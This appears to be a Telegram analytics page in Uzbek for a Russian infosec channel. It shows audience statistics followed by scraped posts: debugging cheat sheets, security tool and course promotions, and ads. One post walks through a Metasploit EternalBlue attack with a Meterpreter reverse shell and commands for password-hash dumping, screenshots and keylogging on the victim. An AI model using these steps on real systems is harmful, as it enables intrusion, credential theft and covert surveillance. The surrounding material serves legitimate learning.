CodeGuard: PySec Edition
Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy
Ko'proq ko'rsatish📈 Telegram kanali CodeGuard: PySec Edition analitikasi
CodeGuard: PySec Edition kanali faol ishtirokchi. Hozirda hamjamiyat 14 005 obunachidan iborat bo'lib, Texnologiyalar & Aralashmalar toifasida 8 813-o'rinni va Rossiya mintaqasida 46 176-o'rinni egallagan.
📊 Auditoriya ko‘rsatkichlari va dinamika
невідомо sanasidan buyon loyiha tez o‘sib, 14 005 obunachiga ega bo‘ldi.
21 Sentabr, 2026 dagi oxirgi ma’lumotlarga ko‘ra kanal barqaror faollikka ega. Oxirgi 30 kunda obunachilar soni 681 ga, so‘nggi 24 soatda esa 92 ga o‘zgardi va umumiy qamrov yuqori darajada qolmoqda.
- Tasdiqlash holati: Tasdiqlanmagan
- Jalb etish (ER): Auditoriya o‘rtacha 10.50% darajada jalb etiladi. Nashrdan keyingi dastlabki 24 soatda kontent odatda umumiy obunachilar sonining 5.72% ini tashkil etuvchi reaksiyalarni to‘playdi.
- Post qamrovi: Har bir post o‘rtacha 1 467 marta ko‘riladi; birinchi sutkada odatda 799 ta ko‘rish yig‘iladi.
- Reaksiyalar va o‘zaro ta’sir: Auditoriya faol: har bir postga o‘rtacha 7 ta reaksiya keladi.
- Tematik yo‘nalishlar: Kontent codeguard, pysec, docker, grep, контейнер kabi asosiy mavzularga jamlangan.
📝 Tavsif va kontent siyosati
Muallif resursni shaxsiy fikrni ifoda etish maydoni sifatida ta’riflaydi:
“Канал по ИБ и этичному хакингу.
Автор: @Arakcheev_Ruslan
Ссылка: @invite_CodeGuard
Рекламный менеджер: @Diggsale
Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”
Yuqori yangilanish chastotasi (oxirgi ma’lumot 22 Sentabr, 2026 da olingan) sababli kanal doimo dolzarb va katta qamrovli bo‘lib qoladi. Analitika auditoriya kontent bilan faol hamkorlik qilishini, uni Texnologiyalar & Aralashmalar toifasidagi muhim ta’sir nuqtasiga aylantirishini ko‘rsatadi.
✅написание пет-проекта с нуля ✅генерация текстов ✅агентский режимБольше всего впечатлила работа агента. Я скинул ссылки на каналы по IT и AI, которые накопились у меня в разных папках, и попросил проанализировать их контент за последний месяц. Задача была простой: выкинуть «каналы-пустышки», которые просто копируют друг у друга новости, и оставить только авторов с прикладным опытом. Claude оставил экспертов, которые делятся практикой внедрения ИИ, вайб-кодингом, нейрогеренерацией и автоматизацией. Итоговый список я объединил в одну подборку. Советую подписаться на авторов, уверен, каждый найдет для себя подходящие каналы. Подписка в 1 клик: https://t.me/addlist/cAgkZ6iNxgJlYzky
🔵MOOC курсы — от Stanford до Университета Мэриленда 🔵Академические программы — NYU Tandon, FSU Offensive Security 🔵Open Security Training — форензика, реверс-инжиниринг, ARM 🔵Сертификации — бесплатные материалы по CISSP, Security+, CEH 🔵Практика — CTF, лаборатории, челленджиДля кого: От новичков до профессионалов, которые хотят систематизировать знания. Сохраняйте — заменит сотню закладок. 😈 CodeGuard: PySec Edition | Чат
strace ./program2. Фильтр по вызовам, связанным с сетью (чтение и запись через сокет):
strace -e trace=network ./program
3. Запись вызовов в файл:
strace -o strace.log ./program
4. Подсоединиться к уже работающему процессу (PID = 1234)
strace -p 12345. Узнать, какие файлы открывает процесс:
strace -e trace=open,openat,close ./program6. Сравнить нормальный запуск и подозрительный (например, если программа лезет куда-то не туда):
strace -f -e trace=execve ./program
7. Маскарад (скрыть путь к программе для тестов):
(Просто переименуйте бинарник или используйте exec -a — чит для CTF, но не более)
8. Найти причину падения (ошибка = -1, например, нет прав на открытие файла):
strace -e trace=file ./program 2>&1 | grep -E "= -1"
Когда используется: Ревёрс-инжиниринг, малвар-анализ, отладка без исходников.
Важно: strace для легковесного анализа; для глубокого реверса используйте ltrace (отслеживает вызовы библиотечных функций).
😈 CodeGuard: PySec Edition | Чат🔵Сбор IOC (IP, домены, хеши) из открытых источников 🔵Обогащение (VirusTotal, AlienVault OTX, AbuseIPDB) 🔵Визуализация связей между атаками 🔵Экспорт отчётов (PDF, HTML)Особенности:
🔵Работает в Docker (легко развернуть) 🔵Есть веб-интерфейс для загрузки логов 🔵Поддерживает MITRE ATT&CK таксоныЗапуск:
git clone https://github.com/OWASP/Skanda
cd Skanda
docker-compose up -d
😈 CodeGuard: PySec Edition | Чат🔵Windows доверяет любому токену FIDO2, который представляется "аппаратным ключом" 🔵Поддельный токен за несколько минут программно эмулируется на Arduino 🔵Атака сработает, даже если Windows Hello вообще не настроен!Для кого: Админы и безопасники крупных компаний (где включена аутентификация через токены) 😈 CodeGuard: PySec Edition | Чат
🟡Новый отладчик на debugpy — PyCharm перешёл на стандартный debugpy (вместо устаревшего pydevd). Полная поддержка PEP 669, меньше оверхэда, работает с asyncio, FastAPI и aiohttp «из коробки» . 🟡AI-интеграция — ACP Registry: каталог AI-кодинг-агентов (OpenCode, Gemini CLI) с установкой в пару кликов. OpenAI Codex теперь встроен в чат, плюс BYOK — подключайте свои API-ключи от OpenAI, Anthropic или локальные модели . И главное — next edit suggestions (NES): AI предсказывает следующее изменение в коде, переключайтесь по Tab, никакого копирования промтов. Не тратит AI-кредитыЧто ещё:
· JavaScript, TypeScript, React и CSS — теперь в базовой бесплатной версии (раньше требовали Pro) · Поддержка NPM-скриптов, ESLint, Prettier · Проверка зависимостей на уязвимости👉 Ссылка 😈 CodeGuard: PySec Edition | Чат
• уверенную работу в Linux и терминале • Git и контроль версий в реальных проектах • Docker и контейнеризацию приложений • Kubernetes и оркестрацию контейнеров • основы сетей, безопасности и хранения данных • автоматизацию задач и диагностику инфраструктуры ... и многому другомуВсе знания закрепляются на практике с помощью заданий с автопроверкой. Материал подаётся понятным языком, шаг за шагом, с большим количеством примеров, схем и демонстраций. После прохождения вы получите сертификат, который можно добавить в резюме. Отдельно курсы стоят 16 600 ₽, но в составе программы доступны всего за 7 990 ₽: открыть на Stepik
Для старта и общей базы: 🟡NetworkChuck — весёлые вводные уроки по всему подряд. 🟡David Bombal — фундаментальные вещи, Wireshark, CTF. 🟡Hak5 — железо, скрипты, обзоры инструментов. Углубляемся в пентест: 🔵IppSec — детальный разбор машин Hack The Box. Маст хэв для OSCP. 🔵HackerSploit — кибербезопасность в действии, от веба до Active Directory. 🔵The XSS Rat — баг-хантер шоу с живыми атаками. Анализ вредоносного ПО и реверс: 🔵John Hammond — ломает малварь и объясняет на пальцах. 🔵LiveOverflow — глубинный реверс-инжиниринг и взлом бинарников.Идеально, чтобы учиться бесплатно. Просто включите и делайте 😈 CodeGuard: PySec Edition | Чат
🟡Новый отладчик на debugpy — PyCharm перешёл на стандартный debugpy (вместо устаревшего pydevd). Полная поддержка PEP 669, меньше оверхэда, работает с asyncio, FastAPI и aiohttp «из коробки» . 🟡AI-интеграция — ACP Registry: каталог AI-кодинг-агентов (OpenCode, Gemini CLI) с установкой в пару кликов. OpenAI Codex теперь встроен в чат, плюс BYOK — подключайте свои API-ключи от OpenAI, Anthropic или локальные модели . И главное — next edit suggestions (NES): AI предсказывает следующее изменение в коде, переключайтесь по Tab, никакого копирования промтов. Не тратит AI-кредитыЧто ещё:
· JavaScript, TypeScript, React и CSS — теперь в базовой бесплатной версии (раньше требовали Pro) · Поддержка NPM-скриптов, ESLint, Prettier · Проверка зависимостей на уязвимости👉 Ссылка 😈 CodeGuard: PySec Edition | Чат
🟡Имена авторов и пути к папкам 🟡Скрытые сетевые пути (\server\share) 🟡Email-адреса, версии ПО 🟡Принтеры, замены шрифтов🔧 Сайт (Windows Only) Установка: Скачать
.exe с официального GitHub.
Как защититься: Очищать метаданные перед публикацией документов. Встроенными средствами Office или утилитами.
😈 CodeGuard: PySec Edition | Чат👉AI Security — защита LLM, тестирование на инъекции, AI Red Teaming 👉Certifications — дорожные карты для OSCP, CISSP, облачных сертификаций 👉Build Your Own Lab — создание домашних полигонов 👉Cybersecurity Domains — фундаментальные знания по всем направлениям 👉Training Reference — шпаргалки, книги, тулзыКак использовать: Склонируйте репозиторий и выбирайте разделы под свои задачи. Сохраняйте — заменит десятки закладок. 😈 CodeGuard: PySec Edition | Чат
gdb ./program2. Точки останова:
break main # поставить брейк на main break *0x401234 # поставить брейк по адресу info breakpoints # посмотреть все брейки delete 1 # удалить брейк #13. Запуск и выполнение:
run # запустить run arg1 arg2 # с аргументами continue # продолжить после брейка stepi # одна инструкция (шаг внутрь) nexti # одна инструкция (шаг с обходом вызовов)4. Просмотр регистров и памяти:
info registers # все регистры p $eax # значение регистра eax x/10x $rsp # 10 слов памяти по адресу rsp x/s $rdi # строка по адресу rdi5. Анализ после сбоя (core dump):
gdb ./program core bt # backtrace (стек вызовов) frame 2 # перейти во второй фрейм info locals # локальные переменные6. Полезное:
set disassembly-flavor intel # синтаксис Intel вместо AT&T disass main # дизассемблировать функциюСохраняйте🔖 😈 CodeGuard: PySec Edition | Чат
🔵15+ тулзов по крипте: base64, хеши, шифры, генераторы паролей 🔵10+ для веба: SQLi пейлоады, XSS, JWT декодер, HTTP анализ 🔵12+ форензика: метаданные, стеганография (LSB), анализ PCAP 🔵8+ реверс-инжиниринг / PWN: ROP гаджеты, шеллкод, BOF паттерны🔗 GitHub ⭐️ новинка 2025 Как запустить (без установки):
ctf-arsenal.replit.app
😈 CodeGuard: PySec Edition | Чатsudo msfconsole
2. Поиск модуля для EternalBlue (MS17-010):
search ms17-0103. Используем модуль:
use exploit/windows/smb/ms17_010_eternalblue4. Настройка (IP цели и своя слушающая машина):
set RHOSTS 192.168.1.100
set LHOST 192.168.1.50
set PAYLOAD windows/x64/meterpreter/reverse_tcp
5. Атака:
run6. Получили Meterpreter shell:
sysinfo getuid shellПолезные команды внутри Meterpreter:
hashdump — вытащить хеши паролей
screenshot — скриншот экрана жертвы
keyscan_start / keyscan_dump — кейлоггер
upload /file /путь — загрузить файл
⚠️ Только на своих системах или с разрешения.
😈 CodeGuard: PySec Edition | Чат👉Оцените покрытие вашей защиты (синие команды) 👉Спланируйте, какие техники использовать в Red Team 👉Экспортируйте/импортируйте слой в JSONДля кого: Синих команд (проверить детекцию техник), красных команд (спланировать маршрут атаки), аналитиков угроз. Почему удобно: Можно добавить скоринг, комментарии и цвета для каждой техники. 😈 CodeGuard: PySec Edition | Чат
